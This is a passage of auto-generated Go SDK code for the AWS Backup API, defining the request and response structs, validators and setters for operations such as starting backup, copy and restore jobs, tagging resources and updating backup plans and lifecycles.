RespMetadata: v,
}
}
// Code returns the exception type name.
func (s *ServiceUnavailableException) Code() string {
return "ServiceUnavailableException"
}
// Message returns the exception's message.
func (s *ServiceUnavailableException) Message() string {
if s.Message_ != nil {
return *s.Message_
}
return ""
}
// OrigErr always returns nil, satisfies awserr.Error interface.
func (s *ServiceUnavailableException) OrigErr() error {
return nil
}
func (s *ServiceUnavailableException) Error() string {
return fmt.Sprintf("%s: %s\n%s", s.Code(), s.Message(), s.String())
}
// Status code returns the HTTP status code for the request's response error.
func (s *ServiceUnavailableException) StatusCode() int {
return s.RespMetadata.StatusCode
}
// RequestID returns the service's response RequestID for request.
func (s *ServiceUnavailableException) RequestID() string {
return s.RespMetadata.RequestID
}
type StartBackupJobInput struct {
_ struct{} `type:"structure"`
// Specifies the backup option for a selected resource. This option is only
// available for Windows VSS backup jobs.
//
// Valid values: Set to "WindowsVSS”:“enabled" to enable WindowsVSS backup
// option and create a VSS Windows backup. Set to “WindowsVSS”:”disabled”
// to create a regular backup. The WindowsVSS option is not enabled by default.
BackupOptions map[string]*string `type:"map"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `type:"string" required:"true"`
// A value in minutes during which a successfully started backup must complete,
// or else AWS Backup will cancel the job. This value is optional. This value
// begins counting down from when the backup was scheduled. It does not add
// additional time for StartWindowMinutes, or if the backup started later than
// scheduled.
CompleteWindowMinutes *int64 `type:"long"`
// Specifies the IAM role ARN used to create the target recovery point; for
// example, arn:aws:iam::123456789012:role/S3Access.
//
// IamRoleArn is a required field
IamRoleArn *string `type:"string" required:"true"`
// A customer chosen string that can be used to distinguish between calls to
// StartBackupJob.
IdempotencyToken *string `type:"string"`
// The lifecycle defines when a protected resource is transitioned to cold storage
// and when it expires. AWS Backup will transition and expire backups automatically
// according to the lifecycle that you define.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, the “expire after days” setting must be
// 90 days greater than the “transition to cold after days” setting. The
// “transition to cold after days” setting cannot be changed after a backup
// has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
Lifecycle *Lifecycle `type:"structure"`
// To help organize your resources, you can assign your own metadata to the
// resources that you create. Each tag is a key-value pair.
RecoveryPointTags map[string]*string `type:"map" sensitive:"true"`
// An Amazon Resource Name (ARN) that uniquely identifies a resource. The format
// of the ARN depends on the resource type.
//
// ResourceArn is a required field
ResourceArn *string `type:"string" required:"true"`
// A value in minutes after a backup is scheduled before a job will be canceled
// if it doesn't start successfully. This value is optional, and the default
// is 8 hours.
StartWindowMinutes *int64 `type:"long"`
}
// String returns the string representation
func (s StartBackupJobInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s StartBackupJobInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *StartBackupJobInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "StartBackupJobInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.IamRoleArn == nil {
invalidParams.Add(request.NewErrParamRequired("IamRoleArn"))
}
if s.ResourceArn == nil {
invalidParams.Add(request.NewErrParamRequired("ResourceArn"))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupOptions sets the BackupOptions field's value.
func (s *StartBackupJobInput) SetBackupOptions(v map[string]*string) *StartBackupJobInput {
s.BackupOptions = v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *StartBackupJobInput) SetBackupVaultName(v string) *StartBackupJobInput {
s.BackupVaultName = &v
return s
}
// SetCompleteWindowMinutes sets the CompleteWindowMinutes field's value.
func (s *StartBackupJobInput) SetCompleteWindowMinutes(v int64) *StartBackupJobInput {
s.CompleteWindowMinutes = &v
return s
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *StartBackupJobInput) SetIamRoleArn(v string) *StartBackupJobInput {
s.IamRoleArn = &v
return s
}
// SetIdempotencyToken sets the IdempotencyToken field's value.
func (s *StartBackupJobInput) SetIdempotencyToken(v string) *StartBackupJobInput {
s.IdempotencyToken = &v
return s
}
// SetLifecycle sets the Lifecycle field's value.
func (s *StartBackupJobInput) SetLifecycle(v *Lifecycle) *StartBackupJobInput {
s.Lifecycle = v
return s
}
// SetRecoveryPointTags sets the RecoveryPointTags field's value.
func (s *StartBackupJobInput) SetRecoveryPointTags(v map[string]*string) *StartBackupJobInput {
s.RecoveryPointTags = v
return s
}
// SetResourceArn sets the ResourceArn field's value.
func (s *StartBackupJobInput) SetResourceArn(v string) *StartBackupJobInput {
s.ResourceArn = &v
return s
}
// SetStartWindowMinutes sets the StartWindowMinutes field's value.
func (s *StartBackupJobInput) SetStartWindowMinutes(v int64) *StartBackupJobInput {
s.StartWindowMinutes = &v
return s
}
type StartBackupJobOutput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a request to AWS Backup to back up a resource.
BackupJobId *string `type:"string"`
// The date and time that a backup job is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// An ARN that uniquely identifies a recovery point; for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
RecoveryPointArn *string `type:"string"`
}
// String returns the string representation
func (s StartBackupJobOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s StartBackupJobOutput) GoString() string {
return s.String()
}
// SetBackupJobId sets the BackupJobId field's value.
func (s *StartBackupJobOutput) SetBackupJobId(v string) *StartBackupJobOutput {
s.BackupJobId = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *StartBackupJobOutput) SetCreationDate(v time.Time) *StartBackupJobOutput {
s.CreationDate = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *StartBackupJobOutput) SetRecoveryPointArn(v string) *StartBackupJobOutput {
s.RecoveryPointArn = &v
return s
}
type StartCopyJobInput struct {
_ struct{} `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a destination backup
// vault to copy to; for example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
//
// DestinationBackupVaultArn is a required field
DestinationBackupVaultArn *string `type:"string" required:"true"`
// Specifies the IAM role ARN used to copy the target recovery point; for example,
// arn:aws:iam::123456789012:role/S3Access.
//
// IamRoleArn is a required field
IamRoleArn *string `type:"string" required:"true"`
// A customer chosen string that can be used to distinguish between calls to
// StartCopyJob.
IdempotencyToken *string `type:"string"`
// Contains an array of Transition objects specifying how long in days before
// a recovery point transitions to cold storage or is deleted.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, on the console, the “expire after days”
// setting must be 90 days greater than the “transition to cold after days”
// setting. The “transition to cold after days” setting cannot be changed
// after a backup has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
Lifecycle *Lifecycle `type:"structure"`
// An ARN that uniquely identifies a recovery point to use for the copy job;
// for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
//
// RecoveryPointArn is a required field
RecoveryPointArn *string `type:"string" required:"true"`
// The name of a logical source container where backups are stored. Backup vaults
// are identified by names that are unique to the account used to create them
// and the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// SourceBackupVaultName is a required field
SourceBackupVaultName *string `type:"string" required:"true"`
}
// String returns the string representation
func (s StartCopyJobInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s StartCopyJobInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *StartCopyJobInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "StartCopyJobInput"}
if s.DestinationBackupVaultArn == nil {
invalidParams.Add(request.NewErrParamRequired("DestinationBackupVaultArn"))
}
if s.IamRoleArn == nil {
invalidParams.Add(request.NewErrParamRequired("IamRoleArn"))
}
if s.RecoveryPointArn == nil {
invalidParams.Add(request.NewErrParamRequired("RecoveryPointArn"))
}
if s.SourceBackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("SourceBackupVaultName"))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetDestinationBackupVaultArn sets the DestinationBackupVaultArn field's value.
func (s *StartCopyJobInput) SetDestinationBackupVaultArn(v string) *StartCopyJobInput {
s.DestinationBackupVaultArn = &v
return s
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *StartCopyJobInput) SetIamRoleArn(v string) *StartCopyJobInput {
s.IamRoleArn = &v
return s
}
// SetIdempotencyToken sets the IdempotencyToken field's value.
func (s *StartCopyJobInput) SetIdempotencyToken(v string) *StartCopyJobInput {
s.IdempotencyToken = &v
return s
}
// SetLifecycle sets the Lifecycle field's value.
func (s *StartCopyJobInput) SetLifecycle(v *Lifecycle) *StartCopyJobInput {
s.Lifecycle = v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *StartCopyJobInput) SetRecoveryPointArn(v string) *StartCopyJobInput {
s.RecoveryPointArn = &v
return s
}
// SetSourceBackupVaultName sets the SourceBackupVaultName field's value.
func (s *StartCopyJobInput) SetSourceBackupVaultName(v string) *StartCopyJobInput {
s.SourceBackupVaultName = &v
return s
}
type StartCopyJobOutput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a copy job.
CopyJobId *string `type:"string"`
// The date and time that a copy job is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
}
// String returns the string representation
func (s StartCopyJobOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s StartCopyJobOutput) GoString() string {
return s.String()
}
// SetCopyJobId sets the CopyJobId field's value.
func (s *StartCopyJobOutput) SetCopyJobId(v string) *StartCopyJobOutput {
s.CopyJobId = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *StartCopyJobOutput) SetCreationDate(v time.Time) *StartCopyJobOutput {
s.CreationDate = &v
return s
}
type StartRestoreJobInput struct {
_ struct{} `type:"structure"`
// The Amazon Resource Name (ARN) of the IAM role that AWS Backup uses to create
// the target recovery point; for example, arn:aws:iam::123456789012:role/S3Access.
//
// IamRoleArn is a required field
IamRoleArn *string `type:"string" required:"true"`
// A customer chosen string that can be used to distinguish between calls to
// StartRestoreJob.
IdempotencyToken *string `type:"string"`
// A set of metadata key-value pairs. Contains information, such as a resource
// name, required to restore a recovery point.
//
// You can get configuration metadata about a resource at the time it was backed
// up by calling GetRecoveryPointRestoreMetadata. However, values in addition
// to those provided by GetRecoveryPointRestoreMetadata might be required to
// restore a resource. For example, you might need to provide a new resource
// name if the original already exists.
//
// You need to specify specific metadata to restore an Amazon Elastic File System
// (Amazon EFS) instance:
//
// * file-system-id: The ID of the Amazon EFS file system that is backed
// up by AWS Backup. Returned in GetRecoveryPointRestoreMetadata.
//
// * Encrypted: A Boolean value that, if true, specifies that the file system
// is encrypted. If KmsKeyId is specified, Encrypted must be set to true.
//
// * KmsKeyId: Specifies the AWS KMS key that is used to encrypt the restored
// file system. You can specify a key from another AWS account provided that
// key it is properly shared with your account via AWS KMS.
//
// * PerformanceMode: Specifies the throughput mode of the file system.
//
// * CreationToken: A user-supplied value that ensures the uniqueness (idempotency)
// of the request.
//
// * newFileSystem: A Boolean value that, if true, specifies that the recovery
// point is restored to a new Amazon EFS file system.
//
// * ItemsToRestore : An array of one to five strings where each string is
// a file path. Use ItemsToRestore to restore specific files or directories
// rather than the entire file system. This parameter is optional. For example,
// "itemsToRestore":"[\"/my.test\"]".
//
// Metadata is a required field
Metadata map[string]*string `type:"map" required:"true" sensitive:"true"`
// An ARN that uniquely identifies a recovery point; for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
//
// RecoveryPointArn is a required field
RecoveryPointArn *string `type:"string" required:"true"`
// Starts a job to restore a recovery point for one of the following resources:
//
// * DynamoDB for Amazon DynamoDB
//
// * EBS for Amazon Elastic Block Store
//
// * EC2 for Amazon Elastic Compute Cloud
//
// * EFS for Amazon Elastic File System
//
// * RDS for Amazon Relational Database Service
//
// * Aurora for Amazon Aurora
//
// * Storage Gateway for AWS Storage Gateway
ResourceType *string `type:"string"`
}
// String returns the string representation
func (s StartRestoreJobInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s StartRestoreJobInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *StartRestoreJobInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "StartRestoreJobInput"}
if s.IamRoleArn == nil {
invalidParams.Add(request.NewErrParamRequired("IamRoleArn"))
}
if s.Metadata == nil {
invalidParams.Add(request.NewErrParamRequired("Metadata"))
}
if s.RecoveryPointArn == nil {
invalidParams.Add(request.NewErrParamRequired("RecoveryPointArn"))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *StartRestoreJobInput) SetIamRoleArn(v string) *StartRestoreJobInput {
s.IamRoleArn = &v
return s
}
// SetIdempotencyToken sets the IdempotencyToken field's value.
func (s *StartRestoreJobInput) SetIdempotencyToken(v string) *StartRestoreJobInput {
s.IdempotencyToken = &v
return s
}
// SetMetadata sets the Metadata field's value.
func (s *StartRestoreJobInput) SetMetadata(v map[string]*string) *StartRestoreJobInput {
s.Metadata = v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *StartRestoreJobInput) SetRecoveryPointArn(v string) *StartRestoreJobInput {
s.RecoveryPointArn = &v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *StartRestoreJobInput) SetResourceType(v string) *StartRestoreJobInput {
s.ResourceType = &v
return s
}
type StartRestoreJobOutput struct {
_ struct{} `type:"structure"`
// Uniquely identifies the job that restores a recovery point.
RestoreJobId *string `type:"string"`
}
// String returns the string representation
func (s StartRestoreJobOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s StartRestoreJobOutput) GoString() string {
return s.String()
}
// SetRestoreJobId sets the RestoreJobId field's value.
func (s *StartRestoreJobOutput) SetRestoreJobId(v string) *StartRestoreJobOutput {
s.RestoreJobId = &v
return s
}
type StopBackupJobInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a request to AWS Backup to back up a resource.
//
// BackupJobId is a required field
BackupJobId *string `location:"uri" locationName:"backupJobId" type:"string" required:"true"`
}
// String returns the string representation
func (s StopBackupJobInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s StopBackupJobInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *StopBackupJobInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "StopBackupJobInput"}
if s.BackupJobId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupJobId"))
}
if s.BackupJobId != nil && len(*s.BackupJobId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupJobId", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupJobId sets the BackupJobId field's value.
func (s *StopBackupJobInput) SetBackupJobId(v string) *StopBackupJobInput {
s.BackupJobId = &v
return s
}
type StopBackupJobOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s StopBackupJobOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s StopBackupJobOutput) GoString() string {
return s.String()
}
type TagResourceInput struct {
_ struct{} `type:"structure"`
// An ARN that uniquely identifies a resource. The format of the ARN depends
// on the type of the tagged resource.
//
// ResourceArn is a required field
ResourceArn *string `location:"uri" locationName:"resourceArn" type:"string" required:"true"`
// Key-value pairs that are used to help organize your resources. You can assign
// your own metadata to the resources you create.
//
// Tags is a required field
Tags map[string]*string `type:"map" required:"true" sensitive:"true"`
}
// String returns the string representation
func (s TagResourceInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s TagResourceInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *TagResourceInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "TagResourceInput"}
if s.ResourceArn == nil {
invalidParams.Add(request.NewErrParamRequired("ResourceArn"))
}
if s.ResourceArn != nil && len(*s.ResourceArn) < 1 {
invalidParams.Add(request.NewErrParamMinLen("ResourceArn", 1))
}
if s.Tags == nil {
invalidParams.Add(request.NewErrParamRequired("Tags"))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetResourceArn sets the ResourceArn field's value.
func (s *TagResourceInput) SetResourceArn(v string) *TagResourceInput {
s.ResourceArn = &v
return s
}
// SetTags sets the Tags field's value.
func (s *TagResourceInput) SetTags(v map[string]*string) *TagResourceInput {
s.Tags = v
return s
}
type TagResourceOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s TagResourceOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s TagResourceOutput) GoString() string {
return s.String()
}
type UntagResourceInput struct {
_ struct{} `type:"structure"`
// An ARN that uniquely identifies a resource. The format of the ARN depends
// on the type of the tagged resource.
//
// ResourceArn is a required field
ResourceArn *string `location:"uri" locationName:"resourceArn" type:"string" required:"true"`
// A list of keys to identify which key-value tags to remove from a resource.
//
// TagKeyList is a required field
TagKeyList []*string `type:"list" required:"true" sensitive:"true"`
}
// String returns the string representation
func (s UntagResourceInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s UntagResourceInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *UntagResourceInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "UntagResourceInput"}
if s.ResourceArn == nil {
invalidParams.Add(request.NewErrParamRequired("ResourceArn"))
}
if s.ResourceArn != nil && len(*s.ResourceArn) < 1 {
invalidParams.Add(request.NewErrParamMinLen("ResourceArn", 1))
}
if s.TagKeyList == nil {
invalidParams.Add(request.NewErrParamRequired("TagKeyList"))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetResourceArn sets the ResourceArn field's value.
func (s *UntagResourceInput) SetResourceArn(v string) *UntagResourceInput {
s.ResourceArn = &v
return s
}
// SetTagKeyList sets the TagKeyList field's value.
func (s *UntagResourceInput) SetTagKeyList(v []*string) *UntagResourceInput {
s.TagKeyList = v
return s
}
type UntagResourceOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s UntagResourceOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s UntagResourceOutput) GoString() string {
return s.String()
}
type UpdateBackupPlanInput struct {
_ struct{} `type:"structure"`
// Specifies the body of a backup plan. Includes a BackupPlanName and one or
// more sets of Rules.
//
// BackupPlan is a required field
BackupPlan *PlanInput `type:"structure" required:"true"`
// Uniquely identifies a backup plan.
//
// BackupPlanId is a required field
BackupPlanId *string `location:"uri" locationName:"backupPlanId" type:"string" required:"true"`
}
// String returns the string representation
func (s UpdateBackupPlanInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s UpdateBackupPlanInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *UpdateBackupPlanInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "UpdateBackupPlanInput"}
if s.BackupPlan == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlan"))
}
if s.BackupPlanId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanId"))
}
if s.BackupPlanId != nil && len(*s.BackupPlanId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupPlanId", 1))
}
if s.BackupPlan != nil {
if err := s.BackupPlan.Validate(); err != nil {
invalidParams.AddNested("BackupPlan", err.(request.ErrInvalidParams))
}
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlan sets the BackupPlan field's value.
func (s *UpdateBackupPlanInput) SetBackupPlan(v *PlanInput) *UpdateBackupPlanInput {
s.BackupPlan = v
return s
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *UpdateBackupPlanInput) SetBackupPlanId(v string) *UpdateBackupPlanInput {
s.BackupPlanId = &v
return s
}
type UpdateBackupPlanOutput struct {
_ struct{} `type:"structure"`
// Contains a list of BackupOptions for each resource type.
AdvancedBackupSettings []*AdvancedBackupSetting `type:"list"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup plan; for
// example, arn:aws:backup:us-east-1:123456789012:plan:8F81F553-3A74-4A3F-B93D-B3360DC80C50.
BackupPlanArn *string `type:"string"`
// Uniquely identifies a backup plan.
BackupPlanId *string `type:"string"`
// The date and time a backup plan is updated, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// Unique, randomly generated, Unicode, UTF-8 encoded strings that are at most
// 1,024 bytes long. Version Ids cannot be edited.
VersionId *string `type:"string"`
}
// String returns the string representation
func (s UpdateBackupPlanOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s UpdateBackupPlanOutput) GoString() string {
return s.String()
}
// SetAdvancedBackupSettings sets the AdvancedBackupSettings field's value.
func (s *UpdateBackupPlanOutput) SetAdvancedBackupSettings(v []*AdvancedBackupSetting) *UpdateBackupPlanOutput {
s.AdvancedBackupSettings = v
return s
}
// SetBackupPlanArn sets the BackupPlanArn field's value.
func (s *UpdateBackupPlanOutput) SetBackupPlanArn(v string) *UpdateBackupPlanOutput {
s.BackupPlanArn = &v
return s
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *UpdateBackupPlanOutput) SetBackupPlanId(v string) *UpdateBackupPlanOutput {
s.BackupPlanId = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *UpdateBackupPlanOutput) SetCreationDate(v time.Time) *UpdateBackupPlanOutput {
s.CreationDate = &v
return s
}
// SetVersionId sets the VersionId field's value.
func (s *UpdateBackupPlanOutput) SetVersionId(v string) *UpdateBackupPlanOutput {
s.VersionId = &v
return s
}
type UpdateGlobalSettingsInput struct {
_ struct{} `type:"structure"`
// A list of resources along with the opt-in preferences for the account.
GlobalSettings map[string]*string `type:"map"`
}
// String returns the string representation
func (s UpdateGlobalSettingsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s UpdateGlobalSettingsInput) GoString() string {
return s.String()
}
// SetGlobalSettings sets the GlobalSettings field's value.
func (s *UpdateGlobalSettingsInput) SetGlobalSettings(v map[string]*string) *UpdateGlobalSettingsInput {
s.GlobalSettings = v
return s
}
type UpdateGlobalSettingsOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s UpdateGlobalSettingsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s UpdateGlobalSettingsOutput) GoString() string {
return s.String()
}
type UpdateRecoveryPointLifecycleInput struct {
_ struct{} `type:"structure"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `location:"uri" locationName:"backupVaultName" type:"string" required:"true"`
// The lifecycle defines when a protected resource is transitioned to cold storage
// and when it expires. AWS Backup transitions and expires backups automatically
// according to the lifecycle that you define.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, the “expire after days” setting must be
// 90 days greater than the “transition to cold after days” setting. The
// “transition to cold after days” setting cannot be changed after a backup
// has been transitioned to cold.
Lifecycle *Lifecycle `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a recovery point;
// for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
//
// RecoveryPointArn is a required field
RecoveryPointArn *string `location:"uri" locationName:"recoveryPointArn" type:"string" required:"true"`
}
// String returns the string representation
func (s UpdateRecoveryPointLifecycleInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s UpdateRecoveryPointLifecycleInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *UpdateRecoveryPointLifecycleInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "UpdateRecoveryPointLifecycleInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.BackupVaultName != nil && len(*s.BackupVaultName) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupVaultName", 1))
}
if s.RecoveryPointArn == nil {
invalidParams.Add(request.NewErrParamRequired("RecoveryPointArn"))
}
if s.RecoveryPointArn != nil && len(*s.RecoveryPointArn) < 1 {
invalidParams.Add(request.NewErrParamMinLen("RecoveryPointArn", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *UpdateRecoveryPointLifecycleInput) SetBackupVaultName(v string) *UpdateRecoveryPointLifecycleInput {
s.BackupVaultName = &v
return s
}
// SetLifecycle sets the Lifecycle field's value.
func (s *UpdateRecoveryPointLifecycleInput) SetLifecycle(v *Lifecycle) *UpdateRecoveryPointLifecycleInput {
s.Lifecycle = v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *UpdateRecoveryPointLifecycleInput) SetRecoveryPointArn(v string) *UpdateRecoveryPointLifecycleInput {
s.RecoveryPointArn = &v
return s
}
type UpdateRecoveryPointLifecycleOutput struct {
_ struct{} `type:"structure"`
// An ARN that uniquely identifies a backup vault; for example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// A CalculatedLifecycle object containing DeleteAt and MoveToColdStorageAt
// timestamps.
CalculatedLifecycle *CalculatedLifecycle `type:"structure"`
// The lifecycle defines when a protected resource is transitioned to cold storage
// and when it expires. AWS Backup transitions and expires backups automatically
// according to the lifecycle that you define.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, the “expire after days” setting must be
// 90 days greater than the “transition to cold after days” setting. The
// “transition to cold after days” setting cannot be changed after a backup
// has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
Lifecycle *Lifecycle `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a recovery point;
// for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
RecoveryPointArn *string `type:"string"`
}
// String returns the string representation
func (s UpdateRecoveryPointLifecycleOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s UpdateRecoveryPointLifecycleOutput) GoString() string {
return s.String()
}
// SetBackupVaultArn sets the BackupVaultArn field's value.
func (s *UpdateRecoveryPointLifecycleOutput) SetBackupVaultArn(v string) *UpdateRecoveryPointLifecycleOutput {
s.BackupVaultArn = &v
return s
}
// SetCalculatedLifecycle sets the CalculatedLifecycle field's value.
func (s *UpdateRecoveryPointLifecycleOutput) SetCalculatedLifecycle(v *CalculatedLifecycle) *UpdateRecoveryPointLifecycleOutput {
s.CalculatedLifecycle = v
return s
}
// SetLifecycle sets the Lifecycle field's value.
func (s *UpdateRecoveryPointLifecycleOutput) SetLifecycle(v *Lifecycle) *UpdateRecoveryPointLifecycleOutput {
s.Lifecycle = v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *UpdateRecoveryPointLifecycleOutput) SetRecoveryPointArn(v string) *UpdateRecoveryPointLifecycleOutput {
s.RecoveryPointArn = &v
return s
}
type UpdateRegionSettingsInput struct {
_ struct{} `type:"structure"`
// Updates the list of services along with the opt-in preferences for the Region.
ResourceTypeOptInPreference map[string]*bool `type:"map"`
}
// String returns the string representation
func (s UpdateRegionSettingsInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s UpdateRegionSettingsInput) GoString() string {
return s.String()
}
// SetResourceTypeOptInPreference sets the ResourceTypeOptInPreference field's value.
func (s *UpdateRegionSettingsInput) SetResourceTypeOptInPreference(v map[string]*bool) *UpdateRegionSettingsInput {
s.ResourceTypeOptInPreference = v
return s
}
type UpdateRegionSettingsOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s UpdateRegionSettingsOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s UpdateRegionSettingsOutput) GoString() string {
return s.String()
}
// Contains metadata about a backup vault.
type VaultListMember struct {
_ struct{} `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup vault; for
// example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
BackupVaultArn *string `type:"string"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
BackupVaultName *string `type:"string"`
// The date and time a resource backup is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// A unique string that identifies the request and allows failed requests to
// be retried without the risk of running the operation twice.
CreatorRequestId *string `type:"string"`
// The server-side encryption key that is used to protect your backups; for
// example, arn:aws:kms:us-west-2:111122223333:key/1234abcd-12ab-34cd-56ef-1234567890ab.
EncryptionKeyArn *string `type:"string"`
// The number of recovery points that are stored in a backup vault.
